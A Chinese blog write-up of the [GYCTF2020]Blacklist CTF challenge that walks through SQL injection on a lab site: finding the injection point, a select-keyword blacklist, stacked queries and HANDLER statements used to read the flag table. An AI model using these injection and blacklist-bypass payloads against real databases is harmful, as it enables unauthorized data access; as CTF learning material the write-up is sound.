首页 > 其他分享 >web19([GYCTF2020]Blacklist):

web19([GYCTF2020]Blacklist):

时间:2024-12-04 20:12:31浏览次数:8  
标签:FlagHere show read GYCTF2020 Blacklist handler 表名 web19 select

1.输入1'回显出语法错误(找到注入点,是字符型)

error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

2.依次输入1' order by 3#1' order by 1#1' order by 2#(只有第一次回显报错,说明列数为2)

3.输入-1' union select 1,2,3#测试回显位
回显:

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

以上是提示过滤了select
4.使用堆叠注入尝试查看库名和表名
1';show databases;

1';show tables;

查看列名:
1';show columns from FlagHere;#

使用hanlder语句获得flag:(好用欸)

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#


tips:

handler 表名 open #打开表
handler 表名 read first #阅读表中的第一行数据
handler 表名 close #关闭表
handler 表名 read next #获取表中的下一行数据

FLAG:flag{a34e3221-985c-43f3-8155-7777fb2e1131}

标签:FlagHere,show,read,GYCTF2020,Blacklist,handler,表名,web19,select
From: https://www.cnblogs.com/halfbrackets/p/18587077

相关文章

  • SQL注入常用语句及一道有意思的题:[GYCTF2020]Blacklist
    SQL注入0x01:联合查询注入常用语句:/?id=1'and1'='2或/?id=1and1=2//判断是字符型注入还是数字型注入//下面以字符型为例/?id=1'unionselect1,2,3#//爆回显位/?id=1'unionselect1,2,database()#//爆数据库名/?id=1'unionselect1,2,group_concat(table_name)fr......
  • 代码审计[二] [GYCTF2020]Easyphp
    代码审计做的好难受的一道反序列化[GYCTF2020]Easyphp参考[GYCTF2020]Easyphp-CSDN博客查看整个网站,尝试弱口令登录,不行。猜网页,register、upload都试了一下,发现www.zip可以下载网页源码。login.php<?phprequire_once('lib.php');?><?php$user=newuser();if(isset($_......
  • [GYCTF2020]Node Game及知识点
    ......
  • 【BUUCTF】Blacklist
    【BUUCTF】Blacklist(SQL注入)题目来源收录于:BUUCTFGYCTF2020题目描述纯粹的SQL注入题当触发黑名单时返回如下过滤了以下关键字setpreparealterrenameselectupdatedeletedropinsertwhere.题解发现可以进行堆叠注入?inject=1';showdatabases;爆表......
  • [GYCTF2020]FlaskApp (pin码,jinja2绕过注入)
    题目就是flask下面是判断模版注入的方法a{*comment*}b和{{7*'7'}}base64编码后解码都报错no,无法判断模版引擎直接用下jinja2的试一试,把编码后的密文拿去解码,payload:{{"".__class__mro(2)__subclasses__()}}报错是jinja2后面就整不会了,看别人的wp整理一下:由于不......
  • [GYCTF2020]Blacklist
    [GYCTF2020]BlacklistStep1输入1,回显:array(2){[0]=>string(1)"1"[1]=>string(7)"hahahah"}稍微尝试注入:/?inject=1'+union+select+1,2,3;#回显:returnpreg_match("/set|prepare|alter|rename|select|update|delete|dro......
  • 使用ublacklist屏蔽某度
    谷歌浏览器,已升级到最新版,uBlacklist插件也已安装设置如下:内容:baidu.com*://*.baidu.com/*tieba.baidu.com*.baidu.*/勾选要启用的搜索引擎:启用后效果如下:点开发现确实屏蔽掉某度了,感觉整个世界瞬间清净晒:惜秦皇汉武,略输文采;唐宗宋祖,稍逊风骚~冯唐易老,李广难封。......
  • [GYCTF2020]Ez_Express 1
    原型链污染,信息收集,命令执行,代码审计这个题我在做之前学了p神的教程https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html打开后可以发现是一个登录界面,之后我们先进行信息收集找到了www.zip这个文件,然后得到了源码index.jsvarexpress=req......
  • [GYCTF2020]EasyThinking 1
    think模板,6.0特性因为题目已经很明确给我们了hint,直接尝试查看特性发现这里是任意文件写入的hint具体可以查看https://www.freebuf.com/vuls/352360.html这里我们直接进行账号注册因为他是根据cookie的名称进行定义文件名称的所以我们可以直接写文件名,这里的文件名长度要求......
  • BUUCTF---web---[GYCTF2020]Blacklist
    1、来到题目连接页面2、测试单引号和双引号,单引号报错,双引号没报错1'1"3、使用万能句式4、使用堆叠注入测试,查看数据库名1';showdatabases;# 5、查看表名1';showtables;#6、查看FlagHere中字段名1';showcolumnsfromFlagHere;#  7、查看flag字段中......